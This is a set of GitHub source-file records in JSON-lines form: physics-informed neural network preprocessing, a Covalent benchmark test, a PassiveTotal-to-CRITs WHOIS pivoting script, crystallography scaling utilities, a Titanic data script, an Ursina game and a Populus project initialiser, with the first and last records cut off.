x,y,t spatio-temporal locations \n array_labels = [\"x\",\"y\",\"t\"]\n for array_label in array_labels:\n \n #Get boundary data features\n data[f\"basewall_features_{array_label}\"] = data[array_label][:,0,:]\n data[f\"leftwall_features_{array_label}\"] = data[array_label][:,1:-1,0]\n data[f\"rightwall_features_{array_label}\"] = data[array_label][:,1:-1,-1]\n\n #Reshape to column format for DL framework\n array_labels = [\"basewall\",\"rightwall\",\"leftwall\"]\n for array_label in array_labels:\n \n data[f\"features_{array_label}\"] = np.concatenate(\n (\n data[f\"{array_label}_features_t\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_y\"].flatten().reshape(-1,1),\n data[f\"{array_label}_features_x\"].flatten().reshape(-1,1)\n ), \n axis=1)\n\n return data\n\ndef extract_interior(data):\n \"\"\"\n Extract interior data from U,V and P arrays.\n \"\"\"\n #Handling data labels; fluid properties\n array_labels = [\"u\", \"v\", \"p\"]\n for array_label in array_labels:\n data[f\"{array_label}_interior\"] = 
data[array_label][:,1:-1,1:-1]\n data[f\"{array_label}_interior_labels\"] = \\\n data[f\"{array_label}_interior\"].flatten().reshape(-1,1)\n \n #Handling features; x,y,t spatio-temporal locations\n array_labels = [\"x\", \"y\", \"t\"]\n for array_label in array_labels:\n data[f\"interior_features_{array_label}\"] = data[array_label][:,1:-1,1:-1]\n\n #Reshape to column format for DL framework\n data[\"features_interior\"] = np.concatenate(\n (\n data[\"interior_features_t\"].flatten().reshape(-1,1),\n data[\"interior_features_y\"].flatten().reshape(-1,1),\n data[\"interior_features_x\"].flatten().reshape(-1,1),\n ),\n axis=1)\n \n return data\n\ndef merge_features(data,geom):\n \"\"\"\n Concatenate features together into a single array.\n \"\"\"\n data[\"y\"], data[\"t\"], data[\"x\"] = np.meshgrid(\n np.linspace(geom[\"y_start\"],geom[\"y_end\"],geom[\"numy\"]),\n np.linspace(geom[\"t_start\"],geom[\"t_end\"],geom[\"numt\"]),\n np.linspace(geom[\"x_start\"],geom[\"x_end\"],geom[\"numx\"]))\n\n #Return an array in form t, x, y\n data[\"features\"] = np.concatenate(\n (\n data[\"t\"].flatten().reshape(-1,1),\n data[\"y\"].flatten().reshape(-1,1),\n data[\"x\"].flatten().reshape(-1,1)\n ),\n axis=1)\n\n return data\n\ndef convert_to_tensors(data,device):\n \"\"\"\n Convert numpy arrays into tensors\n and ensure they reside on the correct PyTorch device\n and have the correct gradient tracking applied\n for automatic differentiation.\n \"\"\"\n geom_components = [\"interior\",\"boundary\"]\n train_test_components = [\"train\",\"test\"]\n\n for geom_component in geom_components:\n for train_test_component in train_test_components:\n\n data[f\"x_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"x_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"y_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"y_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"t_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"t_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"u_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"u_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"v_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"v_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n data[f\"p_{geom_component}_{train_test_component}_tensor\"] = \\\n from_numpy(data[f\"p_{geom_component}_{train_test_component}\"]).\\\n float().requires_grad_().to(device)\n\n return data","repo_name":"harrymchugh/pinns","sub_path":"src/cfdpinn/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6476125499","text":"import random\n\nimport pytest\n\nimport covalent as ct\nfrom covalent._shared_files.util_classes import Status\n\n\n@pytest.mark.parametrize(\"iteration\", range(5))\ndef test_benchmark_primality_test(benchmark, iteration):\n run_benchmark = benchmark[0]\n logger = benchmark[1]\n\n @ct.electron\n def is_prime(n: int) -> bool:\n \"\"\"Primality test using 6k+-1 optimization.\"\"\"\n if n <= 3:\n return n > 1\n if not n % 2 or not n % 3:\n return False\n i = 5\n stop = int(n**0.5)\n while i <= stop:\n if not n % i or not n % (i + 2):\n return 
False\n i += 6\n return True\n\n @ct.lattice\n def primality_tests(nums_to_test):\n res = []\n for i in nums_to_test:\n entry = {}\n entry[\"num\"] = i\n entry[\"is_prime\"] = is_prime(i)\n res.append(entry)\n return res\n\n nums_to_test = [random.randint(1000, 10000) for i in range(50)]\n\n results, status = run_benchmark(iteration, primality_tests, *[nums_to_test])\n logger.debug(results.dict())\n\n assert status == Status(\"COMPLETED\")\n","repo_name":"AgnostiqHQ/covalent","sub_path":"tests/stress_tests/benchmarks/cpu_intensive_workflows_test.py","file_name":"cpu_intensive_workflows_test.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":584,"dataset":"github-code","pt":"66"} +{"seq_id":"43756574715","text":"#!/usr/bin/env python3\n\nimport argparse\nimport datetime\nimport getpass\nimport json\nimport logging\nimport logging.config\nimport os\nimport re\nimport sys\nimport tabulate\nimport uuid\n\nfrom critsapi.critsapi import CRITsAPI\nfrom critsapi.critsdbapi import CRITsDBAPI\n\nfrom lib.pt.common.config import Config\nfrom lib.pt.common.constants import PT_HOME\nfrom lib.pt.core.database import Database\nfrom lib.pt.ptapi import PTAPI\nfrom lib.crits.vocabulary.indicators import IndicatorTypes as it\nfrom operator import itemgetter\nfrom configparser import ConfigParser\n\nlog = logging.getLogger()\nVERSION = \"0.1337\"\n\n# Check configuration directory\nlocal_config_dir = os.path.join(PT_HOME, 'etc', 'local')\nif not os.path.exists(local_config_dir):\n os.makedirs(local_config_dir)\n sys.exit('No etc/local/ directory. See README to create.')\n\nconfig = Config()\n\n# Check local data directory\nif config.core.cache_enabled:\n if not os.path.exists(config.core.cache_dir):\n log.info('Creating Cache directory in '\n '{}'.format(config.core.cache_dir))\n os.makedirs(config.core.cache_dir)\n\n# Initialize loggin\nlog_path = os.path.join(PT_HOME, 'etc', 'local', 'logging.ini')\ntry:\n logging.config.fileConfig(log_path)\nexcept Exception as e:\n sys.exit('unable to load logging configuration file {}: '\n '{}'.format(log_path, str(e)))\n\npt = PTAPI(username=config.core.pt_username, apikey=config.core.pt_apikey)\npt.set_proxy(http=config.proxy.http, https=config.proxy.https)\n\nargparser = argparse.ArgumentParser()\nargparser.add_argument('QUERY', action='store', help='A value to send as a'\n ' query to PT. Email, phone, name, etc.')\nargparser.add_argument('--dev', dest='dev', action='store_true', default=False)\nargparser.add_argument('--crits', dest='crits', action='store_true',\n default=False, help='Write the results to CRITs with'\n ' appropriate relationships.')\nargparser.add_argument('--test', dest='test', action='store_true',\n default=False, help='Run with test data. (Save PT '\n 'queries)')\nargparser.add_argument('-f', dest='force', action='store_true', default=False,\n help='Force a new API query (do not used cached '\n 'results.')\nargparser.add_argument('-t', action='append', dest='tags', default=[],\n help='Bucket list tags for crits. 
Multiple -t options '\n 'are allowed.')\n# Add our mutually exclusive items\nmeg = argparser.add_mutually_exclusive_group()\nmeg.add_argument('-n', dest='name', action='store_true', default=False,\n help='The query is a name and pt_query will not try to '\n 'determine the type automatically.')\nmeg.add_argument('-a', dest='address', action='store_true', default=False,\n help='The query is an address and pt_query will not '\n 'try to determine the type automatically.')\nargs = argparser.parse_args()\n\n# Patterns for determining which type of lookup to do\n# Some items cannot be differentiated via regex (name vs address), so we use\n# a flag to specify these\n# Load patterns for regexes\npattern_config = ConfigParser()\npatterns = {}\nwith open(os.path.join(PT_HOME, 'etc', 'patterns.ini')) as fp:\n pattern_config.readfp(fp)\n\nemail_address_pattern = re.compile(pattern_config.get('email', 'pattern'))\nphone_pattern = re.compile(pattern_config.get('phone', 'pattern'))\ndomain_pattern = re.compile(pattern_config.get('domain', 'pattern'))\n\ndatabase = None\nif config.core.cache_enabled:\n database = Database()\n\nif args.crits:\n HOME = os.path.expanduser(\"~\")\n if not os.path.exists(os.path.join(HOME, '.crits_api')):\n print('''Please create a file with the following contents:\n [crits]\n user = lolnate\n\n [keys]\n prod_api_key = keyhere\n dev_api_key = keyhere\n ''')\n raise SystemExit('~/.crits_api was not found or was not accessible.')\n\n crits_config = ConfigParser()\n crits_config.read(os.path.join(HOME, '.crits_api'))\n\n if crits_config.has_option(\"keys\", \"prod\"):\n crits_api_prod = crits_config.get(\"keys\", \"prod\")\n if crits_config.has_option(\"keys\", \"dev\"):\n crits_api_dev = crits_config.get(\"keys\", \"dev\")\n if crits_config.has_option(\"crits\", \"user\"):\n crits_username = crits_config.get(\"crits\", \"user\")\n\n if args.dev:\n crits_url = config.crits.crits_dev_api_url\n crits_api_key = crits_api_dev\n if len(crits_api_key) != 40:\n print(\"Dev API key in ~/.crits_api is the wrong length! Must be 40\\\n characters.\")\n else:\n crits_url = config.crits.crits_prod_api_url\n crits_api_key = crits_api_prod\n if len(crits_api_key) != 40:\n print(\"Prod API key in ~/.crits_api is the wrong length! 
Must be 40\\\n characters.\")\n\n crits_proxy = {\n 'http': config.crits.crits_proxy_url,\n 'https': config.crits.crits_proxy_url,\n }\n\n # Build our mongo connection\n if args.dev:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri_dev,\n db_name=config.crits.database)\n else:\n crits_mongo = CRITsDBAPI(mongo_uri=config.crits.mongo_uri,\n db_name=config.crits.database)\n crits_mongo.connect()\n # Connect to the CRITs API\n crits = CRITsAPI(\n api_url=crits_url,\n api_key=crits_api_key,\n username=crits_username,\n proxies=crits_proxy,\n verify=config.crits.crits_verify\n )\n\nquery = args.QUERY.rstrip()\n# Get the user launching all this\nuser = getpass.getuser()\n\n# Used to store the type of indicator in CRITs for the query object.\ncrits_indicator_type = ''\n\n# Used to store the cache file location\ncache_file = None\n\nif database and not args.force and config.core.cache_enabled:\n cache_file = database.get_cache_file(query)\n if cache_file:\n log.info('Using cache file for query {}'.format(query))\n with open(cache_file) as fp:\n results = json.loads(fp.read())\n\nbucket_list = ['whois', 'pt:query']\nfor t in args.tags:\n bucket_list.append(t)\n\nif args.name or args.address:\n if args.name:\n field_str = 'name'\n if args.address:\n field_str = 'address'\n if args.test:\n results = pt.get_test_results(field=field_str)\n else:\n results = pt.whois_search(query=query, field=field_str)\n\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/'\\\n '{}'.format(field_str)\n # Use our config defined indicator type of whois email objects\n if args.name:\n crits_indicator_type = it.WHOIS_NAME\n if args.address:\n crits_indicator_type = it.WHOIS_ADDR1\n\n bucket_list.append('registrant')\n\nelif re.match(email_address_pattern, query):\n if args.test:\n results = pt.get_test_results(field='email')\n else:\n results = pt.whois_search(query=query, field='email')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/email'\n # Use our config defined indicator type of whois email objects\n crits_indicator_type = it.WHOIS_REGISTRANT_EMAIL_ADDRESS\n bucket_list.append('registrant')\n\nelif re.match(phone_pattern, query):\n if args.test:\n results = pt.get_test_results(field='phone')\n else:\n results = pt.whois_search(query=query, field='phone')\n # Now add the results to the db if we have it\n if database and not cache_file and config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/phone'\n crits_indicator_type = it.WHOIS_TELEPHONE\n bucket_list.append('registrant')\n\nelif re.match(domain_pattern, query):\n if args.test:\n results = pt.get_test_results(field='domain')\n else:\n results = pt.whois_search(query=query, field='domain')\n # Now add the results to the db if we have it\n if database and not cache_file and 
config.core.cache_enabled:\n filepath = os.path.join(config.core.cache_dir, str(uuid.uuid4()))\n log.debug('Filepath is {}'.format(filepath))\n database.add_results_to_cache(query, user, results, filepath)\n\n base_reference = 'https://www.passivetotal.org/search/whois/domain'\n crits_indicator_type = it.DOMAIN\n\nelse:\n raise SystemExit(\"Your query didn't match a known pattern.\")\n\n# Add the query to CRITs regardless of the number of results\n# TODO: Add campaigns\nif args.crits:\n found = False\n # Search for it with raw mongo because API is slow\n crits_result = crits_mongo.find('indicators', {'value': query, 'type':\n crits_indicator_type})\n if crits_result.count() > 0:\n for r in crits_result:\n if r['value'] == query:\n indicator = r\n found = True\n if not found:\n indicator = crits.add_indicator(\n value=query,\n itype=crits_indicator_type,\n source=config.crits.default_source,\n reference='Added via pt_query.py',\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence='low',\n indicator_impact='low',\n description='Queried with pt_query.py',\n )\n\n # This is pretty hacky - Since we use both the raw DB and the API, we might\n # receive either an '_id' or an 'id' back. We are going to standardize on\n # 'id', rather than '_id'\n if 'id' not in indicator:\n if '_id' not in indicator:\n print(repr(indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in new indicator'.format(query))\n else:\n indicator['id'] = indicator['_id']\n\n# Iterate through all results and print/add to CRITs (if args provided)\nformatted_results = []\nfor result in results['results']:\n if 'domain' in result:\n crits_indicators_to_add = []\n # Row contains:\n # Domain, Registrant Email, Registrant Name, Registrant Date,\n # Expiration Date, Tags\n row = ['', '', '', '', '', '']\n row[0] = result['domain']\n # Email address used to register\n if 'registrant' in result:\n # Append the registrant email\n if 'email' in result['registrant']:\n row[1] = result['registrant']['email']\n email_obj = {\n 'value': result['registrant']['email'],\n 'type': it.WHOIS_REGISTRANT_EMAIL_ADDRESS,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(email_obj)\n if 'name' in result['registrant']:\n row[2] = result['registrant']['name']\n name_obj = {\n 'value': result['registrant']['name'],\n 'type': it.WHOIS_NAME,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(name_obj)\n if 'telephone' in result['registrant']:\n row[3] = result['registrant']['telephone']\n phone_obj = {\n 'value': result['registrant']['telephone'],\n 'type': it.WHOIS_TELEPHONE,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(phone_obj)\n if 'street' in result['registrant']:\n addr1_obj = {\n 'value': result['registrant']['street'],\n 'type': it.WHOIS_ADDR1,\n 'related_to': result['domain']\n }\n crits_indicators_to_add.append(addr1_obj)\n\n # Date the domain was registered\n if 'registered' in result:\n row[4] = result['registered']\n if 'expiresAt' in result:\n row[5] = result['expiresAt']\n formatted_results.append(row)\n # TODO: Tags. 
They appear to be an extra API query which is annoying\n\n reference = '{0}/{1}'.format(base_reference, query)\n\n if args.crits:\n # Let's try getting the confidence and impact from the parent whois\n # indicator\n confidence = 'low'\n impact = 'low'\n if 'confidence' in indicator:\n if 'rating' in indicator['confidence']:\n confidence = indicator['confidence']['rating']\n if 'impact' in indicator:\n if 'rating' in indicator['impact']:\n impact = indicator['impact']['rating']\n # If not in CRITs, add all the associated indicators\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n new_ind = crits.add_indicator(\n value=result['domain'],\n itype=it.DOMAIN,\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # The CRITs API allows us to add a campaign to the indicator, but\n # not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n new_ind['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(indicator['id'], 'Indicator',\n new_ind['id'], 'Indicator',\n rel_type='Registered')\n\n # Now we can add the rest of the WHOIS indicators (if necessary)\n for ind in crits_indicators_to_add:\n # If the indicator exists, just get the id and use it to build\n # relationships. We will look for one with the same source.\n # If not in CRITs, add it and relate it.\n whois_indicator = crits_mongo.find_one(\n 'indicators',\n {\n 'value': ind['value'],\n 'type': ind['type'],\n 'source.name':\n config.crits.default_source,\n })\n if not whois_indicator:\n bucket_list = ['whois pivoting', 'pt:found']\n for t in args.tags:\n bucket_list.append(t)\n whois_indicator = crits.add_indicator(\n value=ind['value'],\n itype=ind['type'],\n source=config.crits.default_source,\n reference=reference,\n method='pt_query.py',\n bucket_list=bucket_list,\n indicator_confidence=confidence,\n indicator_impact=impact,\n description='Discovered through PT whois pivots'\n )\n\n # This is pretty hacky - Since we use both the raw DB and the\n # API, we might receive either an '_id' or an 'id' back. 
We\n # are going to standardize on 'id', rather than '_id'\n if 'id' not in whois_indicator:\n if '_id' not in whois_indicator:\n print(repr(whois_indicator))\n raise SystemExit('id and _id not found for query: '\n '{} in whois indicator'.format(query))\n whois_indicator['id'] = whois_indicator['_id']\n\n # Not a huge deal, but make sure we don't waste time adding\n # a relationship to itself\n if whois_indicator['id'] == new_ind['id']:\n continue\n # The CRITs API allows us to add a campaign to the indicator,\n # but not multiple campaigns at one time,\n # so we will do it directly with the DB.\n # We want to replicate the campaigns of the WHOIS indicator (if\n # a campaign exists) to the new indicator.\n # Continue with the same campaign\n if 'campaign' in indicator:\n for campaign in indicator['campaign']:\n crits_mongo.add_embedded_campaign(\n whois_indicator['id'],\n 'indicators',\n campaign['name'],\n campaign['confidence'],\n campaign['analyst'],\n datetime.datetime.now(),\n campaign['description']\n )\n\n # If the new indicator and the indicator are not related,\n # relate them.\n if not crits.has_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered'):\n crits.forge_relationship(whois_indicator['id'],\n 'Indicator',\n new_ind['id'],\n 'Indicator',\n rel_type='Registered')\n\n# Add a bucket_list item to track that we searched for this whois indicator\nif args.crits:\n crits_mongo.add_bucket_list_item(indicator['id'], 'indicators',\n 'pt:whois_search_completed')\n\n# SORT BY DATE\nformatted_results = sorted(formatted_results, key=itemgetter(3), reverse=True)\n# Row contains:\n# Domain, Registrant Email, Registrant Name, Registrant Telephone,\n# Registrant Date, Expiration Date, Tags\nheaders = ['Domain', 'Registrant Email', 'Registrant Name',\n 'Registrant Telephone', 'Registrant Date', 'Expiration Date',\n 'Tags']\nprint(tabulate.tabulate(formatted_results, headers))\n","repo_name":"IntegralDefense/ptauto","sub_path":"bin/pt_query.py","file_name":"pt_query.py","file_ext":"py","file_size_in_byte":19839,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"18713877002","text":"\n__author__ = [\"S. 
Basu\"]\n__license__ = \"M.I.T\"\n__date__ = \"28/07/2017\"\n__refactordate__ = \"10/05/2021\"\n\nimport os, sys,glob\nimport logging\nfrom src.abstract import Abstract\nfrom src.xscale_output import OutputParser\n\nlogger = logging.getLogger('sxdm')\n\nclass ScaleUtils(Abstract):\n\n def find_corrects(self, inData):\n self.results['listofCORRECTfiles'] = []\n try:\n for fname in inData['listofHKLfiles']:\n folder = os.path.dirname(fname)\n path = os.path.join(folder, 'CORRECT.LP')\n\n if os.path.isfile(path):\n self.results['listofCORRECTfiles'].append(path)\n\n else:\n logger.info('CORRECT.LP could not be found in %s' %folder)\n self.setFailure()\n except KeyError:\n self.setFailure()\n return\n\n def check_bfactor(self, inData):\n self.find_corrects(inData)\n bfac_dicts = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n fh = open(cor_name, 'r')\n _all = fh.readlines()\n fh.close()\n xasci = fname\n for lines in _all:\n if \"WILSON LINE\" in lines:\n line = lines.split()\n try:\n bfac_dicts[xasci] = float(line[9])\n except Exception:\n logger.info('B-factor might be negative, not considered')\n else:\n pass\n\n self.results['bfac_sorted_hkls'] = sorted(bfac_dicts.items(), key=lambda x : x[1])\n return\n\n def rank_rmeas(self, inData):\n self.find_corrects(inData)\n rmeas_dict = {}\n\n if len(self.results['listofCORRECTfiles']) == 0:\n err = 'ValueError: no CORRECT.LP found'\n logger.info('ValueError: {}'.format(err))\n else:\n for fname, cor_name in zip(inData['listofHKLfiles'], self.results['listofCORRECTfiles']):\n indict = {'CORRECT_file': cor_name}\n correct_parse = OutputParser(indict)\n correct_parse.parse_xds_stats(indict)\n mean_rmeas = correct_parse.mean_rmeas_calc(correct_parse.results['xds_stat'])\n rmeas_dict[fname] = mean_rmeas\n\n self.results['rmeas_sorted_hkls'] = sorted(rmeas_dict.items(), key=lambda x:x[1])\n return\n\n\n def ref_choice(self, inData):\n reference = None\n if inData['fom'] == 'bfac':\n self.check_bfactor(inData)\n try:\n reference = self.results['bfac_sorted_hkls'][0][0]\n\n except (IndexError, ValueError):\n err = 'bfactor selection may not work'\n logger.error(err)\n self.setFailure()\n\n\n elif inData['fom'] == 'rmeas':\n self.rank_rmeas(inData)\n try:\n reference = self.results['rmeas_sorted_hkls'][0][0]\n except (IndexError, ValueError):\n err = 'Rmeas based referenceing may not have worked'\n logger.error(err)\n self.setFailure()\n else:\n pass\n self.results['reference'] = reference\n return\n\n def Bfact_sorter(self, inData):\n bfac_sorted_hkls = []\n self.check_bfactor(inData)\n if len(self.results['bfac_sorted_hkls']) > 0:\n for i in range(len(self.results['bfac_sorted_hkls'])):\n bfac_sorted_hkls.append(self.results['bfac_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n\n self.results['bfact_sorted_hkls'] = bfac_sorted_hkls\n return\n\n def rmeas_sorter(self, inData):\n rmeas_sorted_hkls = []\n self.rank_rmeas(inData)\n if len(self.results['rmeas_sorted_hkls']) > 0:\n for i in range(len(self.results['rmeas_sorted_hkls'])):\n rmeas_sorted_hkls.append(self.results['rmeas_sorted_hkls'][i][0])\n else:\n err = \"Rmeas based sorting did not work, check\"\n logger.error(err)\n self.setFailure()\n self.results['rmeas_sorted_hkls'] = rmeas_sorted_hkls\n return\n\ndef main():\n hklpaths 
= glob.glob(os.path.join(sys.argv[1], 'XDS_ASCII.HKL'))\n inData = dict()\n inData['listofHKLfiles'] = hklpaths\n sc = ScaleUtils(inData)\n sc.rmeas_sorter(inData)\n print(sc.results['rmeas_sorted_hkls'])\n\nif __name__ == '__main__':\n main()\n","repo_name":"shibom/sxdm","sub_path":"src/scale_utl.py","file_name":"scale_utl.py","file_ext":"py","file_size_in_byte":4804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3314307710","text":"import warnings#忽略警告提示\nwarnings.filterwarnings('ignore')\n\nimport numpy as np\nimport pandas as pd\n\ntrain=pd.read_csv('train.csv')\ntest=pd.read_csv('test.csv')\nprint('训练数据集:',train.shape,'测试数据集',test.shape)\n\nrowNum_train=train.shape[0]\nrowNum_test=test.shape[0]\nprint('训练集行数:',rowNum_train)\nprint('测试集行数',rowNum_test)\n\nfull_df=train.append(test,ignore_index=True)\nprint('合并后的数据集:',full_df.shape)\n\nprint(full_df.head())#打印前几行\nprint(full_df.describe())#查看数据的统计信息\nprint(full_df.info())#查看每一列的数据类型,数据总数,以及是否有数据缺失\n\nfull_df['Fare']=full_df['Fare'].fillna(full_df['Fare'].mean())\nfull_df['Age']=full_df['Age'].fillna(full_df['Age'].mean())#把年龄和费用(票价)用均值来替代\nprint(full_df['Embarked'].mode())#查看Embark这一列的众数\nfull_df['Embarked']=full_df['Embarked'].fillna(full_df['Embarked'].mode())\n\nprint(full_df.info())\nsex_mapDict={'male':1,'female':0}\nfull_df['Sex']=full_df['Sex'].map(sex_mapDict)\nprint(full_df.head())\n\nembarkedDF=pd.DataFrame()\nembarkedDF=pd.get_dummies(full_df['Embarked'],prefix='Embarked')#使用get_dummies进行one-hot编码,列名前缀是Embarked\nprint(embarkedDF.head())\n\nfull=pd.concat([full_df,embarkedDF],axis=1)#因为这里用了登船港口(Embarked)进行了one-hot编码产生了它的虚拟变量,所以这里把它删掉\nfull.drop('Embarked',axis=1,inplace=True)\nprint(full.head())\nprint(full.shape)\n\nname1='Braund, Mr. 
Owen Harris'\nstr1=name1.split(',')[1]\nstr2=str1.split('.')[0]\nstr3=str2.split()\n\ndef getTitle(name):\n str1 = name1.split(',')[1]\n str2 = str1.split('.')[0]\n str3 = str2.strip()\n return str3\n\n\n\ntitleDF=pd.DataFrame()\ntitleDF['Title']=full['Name'].map(getTitle)\nprint(titleDF.head())\n\n# full=pd.concat([full,titleDF],axis=1)\n#\n# full.drop('Name',axis=1,inplace=True)\n# print(full.head)\n#\n# corrDF=full.corr()\n# print(corrDF)\n#\n# print(corrDF['Survived'].sort_values(ascending=False))\n#\n# full_X=pd.concat([titleDF],axis=1)\n# print(full_X.head())","repo_name":"2981047480/zephyr","sub_path":"大二机器学习记录/泰坦尼克数据/算法.py","file_name":"算法.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"8966484604","text":"#importowanie wszystkich potrzebnych bibliotek i plików\nfrom GameParameters import *\nfrom ursina import *\nfrom Player import *\nfrom Train import *\nfrom Menu import *\nfrom screeninfo import get_monitors\nfrom train_spawner import *\nfrom high_scores import *\n\nGameParameters.paused = True\n#ustawianie pełnego ekranu\nmonitor = get_monitors()\napp = Ursina(fullscreen=True)\nwindow.size = Vec2(monitor[0].width, monitor[0].height)\nwindow.fps_counter.disable()\n#incjalizacja obiektów\nplayer = Player(collider='box', model='cube', position=(0, 0, 0))\nmain_menu = Menu(player)\nfor i in range(8):\n ground = Entity(model='/assets/tunele.glb', collider='box', scale=0.67, position=(0, -7, 110 *i))\n#światło bezpośrednio nad graczem\nL = PointLight(y = 10, x = 0, z = 0, color = color.white, shadows = True)\nplayer.menu = main_menu\n#wygenerowanie początkowych pociągów\nGameParameters.train += train_generator_init(player)\n#ustawienie głośnosci\nAudio.volume_multiplier = 0.5\n\ndef update():\n #przy śmierci usuwanie pociągów i wyświetlanie menu śmierci\n if GameParameters.death == True and GameParameters.paused == False:\n for i in GameParameters.train:\n i.disable()\n GameParameters.train.clear()\n main_menu.death_menu(player)\n #zwiększanie wyniku i szybkości\n if GameParameters.paused == False:\n GameParameters.score += int(time.dt * 100)\n main_menu.score_point.text = \"Score:\" + str(GameParameters.score)\n GameParameters.speed += 0.01\n #pojawianie się pociągów\n if (GameParameters.can_spawn == True and GameParameters.paused == False):\n GameParameters.train += train_generator(player)\n GameParameters.can_spawn = False\n\n#tekstura nieba\nSky(texture='assets/night.jpg')\napp.run()\n","repo_name":"BartoszKaca/subway_clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9948245835","text":"import os\nimport shutil\n\nfrom populus import ASSETS_DIR\n\nfrom populus.config.helpers import (\n check_if_json_config_file_exists,\n)\n\nfrom populus.utils.filesystem import (\n ensure_path_exists,\n)\n\nfrom populus.project import (\n Project,\n)\n\nGREETER_SOURCE_PATH = os.path.join(ASSETS_DIR, 'Greeter.sol')\nGREETER_TEST_PATH = os.path.join(ASSETS_DIR, 'test_greeter.py')\n\n\ndef init_project(project_dir, logger):\n\n if project_dir is None:\n project_dir = os.getcwd()\n else:\n project_dir = os.path.abspath(project_dir)\n\n has_json_config = check_if_json_config_file_exists(project_dir)\n\n if has_json_config:\n logger.info(\n \"Found existing `project.json` file. 
Not writing default config.\"\n )\n\n project = Project(project_dir, create_config_file=True)\n logger.info(\n \"Wrote default populus configuration to `./{0}`.\".format(\n os.path.relpath(project.config_file_path),\n )\n )\n\n for source_dir in project.contracts_source_dirs:\n if ensure_path_exists(source_dir):\n logger.info(\n \"Created Directory: ./{0}\".format(\n os.path.relpath(source_dir)\n )\n )\n\n example_contract_path = os.path.join(project.contracts_source_dirs[0], 'Greeter.sol')\n if not os.path.exists(example_contract_path):\n shutil.copy(GREETER_SOURCE_PATH, example_contract_path)\n logger.info(\"Created Example Contract: ./{0}\".format(\n os.path.relpath(example_contract_path)\n ))\n\n tests_dir = os.path.join(project.project_dir, 'tests')\n if ensure_path_exists(tests_dir):\n logger.info(\"Created Directory: ./{0}\".format(os.path.relpath(tests_dir)))\n\n example_tests_path = os.path.join(tests_dir, 'test_greeter.py')\n if not os.path.exists(example_tests_path):\n shutil.copy(GREETER_TEST_PATH, example_tests_path)\n logger.info(\"Created Example Tests: ./{0}\".format(\n os.path.relpath(example_tests_path)\n ))\n\n return project\n","repo_name":"veox/populllus","sub_path":"populus/api/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16995593840","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('kingfisher.jpg', cv2.IMREAD_COLOR)\n\n# Draw a line on the image\ncv2.line(img, (10,10), (600, 700), (255,255,255), 10)\n\n# Draw a rectangel on the image\n\ncv2.rectangle(img, (10, 15), (250, 